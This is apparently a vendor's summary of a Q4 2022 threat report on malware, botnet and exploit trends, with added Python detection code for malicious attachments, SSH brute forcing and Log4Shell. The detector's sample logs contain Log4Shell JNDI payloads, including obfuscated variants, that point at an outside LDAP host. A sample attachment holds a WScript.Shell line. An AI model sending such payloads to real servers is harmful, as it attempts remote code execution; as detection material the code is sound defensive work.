Interactive Report Summary

Q4 2022 and Year in Review Threat Report

2022 was a record-breaking year for cyber threats. Although Q4 showed dips across all three threat categories Nuspire monitors (malware, botnets and exploits), the year's total activity surged compared with 2021. Learn more about the biggest threats we saw in Q4, plus get a breakdown of how each category we measure compares to 2021.

Top Findings at a Glance

MALWARE

Malware activity grew year-over-year despite a decrease in Q4

Malware grew 6.85% in 2022

BOTNET

Botnet activity jumped over 30% in 2022

Torpig Mebroot captures 40.26% of all 2022 botnet activity

EXPLOIT

Exploits nearly doubled in 2022

Brute forcing dominates Q4, increasing nearly 400% over Q3

Nuspire - Security Team

Cyberattack Spotlight: Remote Code Execution

Remote code execution (RCE) is a favorite tool of cyber criminals because it lets them run code of their choosing on a target system over the network, without any physical access. With that foothold, the adversary can steal data, cause service disruption, deploy ransomware and move laterally to other areas of the network.

Notable RCE vulnerabilities announced in Q4 include: 
Microsoft Exchange, ConnectWise, Microsoft Windows and Microsoft SPNEGO  

Methodology

How Nuspire produces its threat intelligence 


GATHER

Collects threat intelligence and data from global sources, client devices and reputable third parties.

PROCESS

Data is analyzed by a combination of machine learning, algorithm scoring and anomaly detection.

DETECT

Log data is ingested into Nuspire's cloud-based SIEM, which raises alerts to the security operations center (SOC). The SOC then notifies the client and works with them to remediate the threat.

EVALUATE

Analysts further scrutinize the research, scoring and tracking of existing and new threats.

DISSEMINATE

Analysts leverage the insights to constantly improve the SOC, alerting, and the community through the creation of detection rules, briefs, and presentations.

Q4 2022 in Review

October through December


October 3

On-Premises Microsoft Exchange Zero-Day Vulnerabilities Being Actively Exploited 

October 7

Fortinet Announces Critical Authentication Bypass Vulnerability 

October 27

OpenSSL Pre-Announces Critical Vulnerability Patch 

November 1

OpenSSL Releases Security Patch Downgrading Vulnerability from "Critical" to "High"

November 3

ConnectWise Server Backup Solution Reports Critical Remote Code Execution (RCE) Vulnerability 

November 9

Microsoft Fixes 6 Actively Exploited Vulnerabilities 

November 15

Massive Redirect Malware Campaign Affects 15,000 WordPress Sites 

December 2

Black Basta Ransomware Group Actively Targeting U.S. Companies Using QakBot Malware 

December 7

SiriusXM Vulnerability Allows Hackers to Remotely Unlock and Start Cars 

December 12

Fortinet Announces Critical Buffer Overflow Vulnerability in FortiOS 

December 14

Microsoft Reclassifies SPNEGO Extended Negotiation Security Mechanism Vulnerability as Critical 

December 15

Citrix ADC and Gateway Zero-Day Under Active Exploitation 

December 29

New RisePro Information-Stealing Malware Increasingly Popular Among Cybercriminals 

Let's Dive Into the Data

While some threat activity declined in Q4 2022, every category we measure increased year-over-year

[Activity tile: Total Events, Unique Variants, Total Activity -0.56%]

Malware

We observed a decrease in malware activity compared with the previous quarter, most likely due to the continuing effects of Microsoft's decision to block Visual Basic for Applications (VBA) macros by default in Office files downloaded from the internet.

It's important to note that year-over-year, malware usage is still high, increasing 6.85% in 2022. Phishing is far and away the most popular delivery method for malware, and in Q4 we saw threat actors shift to Excel add-in (.XLL) files and JavaScript variants as delivery formats.
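The shift from VBA macros to .XLL add-ins and JavaScript attachments changes what a mail gateway or SOC triage script should look for. The following is an added example (not code from Nuspire's report) of attachment triage in Python: it recognises macro-enabled OOXML containers by the vbaProject.bin part inside the zip, recognises XLL add-ins as native PE DLLs that carry the xlAutoOpen export name Excel calls on load, and flags script attachments and double extensions. The file names, byte blobs and verdict labels are constructed for the example.

```python
"""Triage e-mail attachments for the delivery formats discussed above:
Office macros (vbaProject.bin inside the OOXML zip), Excel add-ins (.xll,
native PE DLLs exporting xlAutoOpen) and JavaScript droppers.
Added example; sample files below are constructed, not real malware."""
import io
import struct
import zipfile

SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".hta", ".vbs"}
MACRO_EXTENSIONS = {".docm", ".xlsm", ".pptm", ".dotm", ".xltm"}


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def ooxml_has_vba(data: bytes) -> bool:
    """True if an OOXML (zip) container carries a VBA project part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def classify_attachment(filename: str, data: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    name = filename.lower()
    ext = name[name.rfind("."):] if "." in name else ""
    if ext in SCRIPT_EXTENSIONS:
        findings.append("script-attachment")
    if name.count(".") > 1 and ext in SCRIPT_EXTENSIONS | {".exe", ".scr"}:
        findings.append("double-extension")          # e.g. invoice.pdf.js
    if is_pe(data):
        findings.append("native-pe")
        if b"xlAutoOpen" in data:                    # Excel runs xlAutoOpen on load
            findings.append("xll-add-in")
        if ext not in {".xll", ".exe", ".dll"}:
            findings.append("extension-mismatch")    # PE disguised as something else
    if ext in MACRO_EXTENSIONS or ooxml_has_vba(data):
        findings.append("vba-macro")
    return findings


def _fake_pe(payload: bytes = b"") -> bytes:
    """Constructed minimal PE-shaped blob (headers only, not an executable)."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)         # e_lfanew -> offset 0x40
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20 + payload


def _fake_ooxml(with_vba: bool) -> bytes:
    """Constructed minimal OOXML zip, optionally with a VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0")
    return buf.getvalue()


# Constructed sample attachments (file names are hypothetical)
SAMPLES = {
    "quote.xll": _fake_pe(b"xlAutoOpen"),
    "invoice.pdf.js": b"var s = new ActiveXObject('WScript.Shell');",
    "report.xlsm": _fake_ooxml(True),
    "budget.xlsx": _fake_ooxml(False),
    "photo.png": _fake_pe(),
}


def triage(samples=SAMPLES) -> dict[str, list[str]]:
    return {name: classify_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage().items():
        print(f"{name:16} {', '.join(findings) or 'clean'}")
```

A real gateway would parse the PE export directory rather than grep for the export name, but the two checks that matter operationally are already here: an XLL is a native binary, so it should be handled like an .exe regardless of the Office-looking extension, and a PE body behind a non-executable extension is a finding on its own.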

[Activity tile: Total Events, Unique Variants, Total Activity -0.35%]

Botnets

Botnet activity in Q4 dropped significantly; however, overall activity for 2022 jumped over 30% when compared to 2021.

Torpig Mebroot is a repeat offender on Nuspire’s Quarterly Threat Reports and has appeared once again in the top position in Q4. Even with a substantial decrease in activity (60.34%), Torpig Mebroot still captured just shy of 60% of all witnessed botnet activity during Q4.

[Activity tile: Total Events, Unique Variants, Total Activity 0.59%]

Exploits

Nuspire witnessed a surge in brute forcing in Q4, with activity increasing by nearly 400% over Q3. In a distant second place, we saw continued exploitation of Apache's Log4j vulnerability (Log4Shell), which shook the industry to its core in December 2021 and continues to wreak havoc today.
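Both of the exploit trends above are detectable from ordinary logs. The following is an added example (not Nuspire's own detection logic) in Python that runs two checks over constructed log lines: a sliding-window count of failed SSH logins per source address, which is the basic brute-force signal, and a Log4Shell detector that first collapses the nested lookup tricks attackers use to hide the JNDI string (`${lower:j}`, `${upper:n}`, `${::-j}`, `${env:X:-j}`) and only then looks for `${jndi:`. The IP addresses, timestamps and requests are constructed; the threshold and window are illustrative defaults.

```python
"""Detections for the two exploit trends above, run over constructed logs.
Added example; log lines, addresses and thresholds are illustrative."""
import re
from collections import defaultdict, deque
from datetime import datetime

# --- brute forcing: N failed logins from one source inside a time window ---
FAILED_LOGIN = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+)"
)


def detect_brute_force(lines, threshold=5, window_s=60):
    """Return {source: time of the first alert} for sources that reach
    `threshold` failed logins within any `window_s`-second window."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        m = FAILED_LOGIN.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        q = recent[m["src"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop events outside window
            q.popleft()
        if len(q) >= threshold and m["src"] not in alerts:
            alerts[m["src"]] = ts
    return alerts


# --- Log4Shell: unmask nested lookups, then look for ${jndi: ---
LOOKUP = re.compile(r"\$\{([^${}]*)\}")      # innermost ${...} only


def _resolve(m):
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                     # keep the lookup we want to see
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.rsplit(":-", 1)[1]        # default-value syntax ${x:-literal}
    return m.group(0)                         # unknown lookup: leave untouched


def normalize_lookups(s):
    """Repeatedly resolve innermost lookups until the string stops changing."""
    while True:
        new = LOOKUP.sub(_resolve, s)
        if new == s:
            return new
        s = new


def find_jndi(lines):
    """Return the normalized form of every line that carries a JNDI lookup."""
    return [n for n in map(normalize_lookups, lines) if "${jndi:" in n.lower()]


# Constructed sample logs
SSH_LOG = [
    "2022-11-20T03:14:01 sshd[812]: Failed password for root from 203.0.113.7 port 51822 ssh2",
    "2022-11-20T03:14:05 sshd[812]: Failed password for root from 203.0.113.7 port 51822 ssh2",
    "2022-11-20T03:14:06 sshd[815]: Failed password for invalid user admin from 198.51.100.9 port 40110 ssh2",
    "2022-11-20T03:14:09 sshd[812]: Failed password for invalid user admin from 203.0.113.7 port 51830 ssh2",
    "2022-11-20T03:14:13 sshd[812]: Failed password for root from 203.0.113.7 port 51836 ssh2",
    "2022-11-20T03:14:16 sshd[818]: Accepted publickey for ops from 198.51.100.9 port 40112 ssh2",
    "2022-11-20T03:14:17 sshd[812]: Failed password for root from 203.0.113.7 port 51840 ssh2",
]
WEB_LOG = [
    '198.51.100.23 - - [20/Nov/2022:04:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Nov/2022:04:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [20/Nov/2022:04:02:16 +0000] "GET /?x=${${lower:j}${upper:n}di:ldap://203.0.113.7:1389/a} HTTP/1.1" 400 0 "-" "curl/7.85"',
    '203.0.113.7 - - [20/Nov/2022:04:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${env:NaN:-l}dap://203.0.113.7:1389/a}"',
    '198.51.100.23 - - [20/Nov/2022:04:02:20 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("brute force:", detect_brute_force(SSH_LOG))
    for n in find_jndi(WEB_LOG):
        print("jndi:", n)
```

Two points worth carrying into production rules: a fixed "N failures" count without a time window fires on slow-but-legitimate typos, so the deque keeps only events inside the window; and a plain `${jndi:` string match misses the obfuscated variants, which is exactly why the normaliser resolves lookups inside-out before matching.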

Our analysis also uncovered that the Hikvision security camera vulnerability announced in October 2021 saw a resurgence in exploit attempts in Q4. Our experts predict we’ll see more of these IoT attacks throughout 2023.

Stay Vigilant

Activity across all three threat categories rose in 2022. Even with vendors taking action to reduce attack vectors, such as Microsoft disabling VBA macros by default, threat actors have evolved and shifted their methods. Download the full report to find out how you can prepare and tighten your security controls around the expected challenges highlighted by our security experts.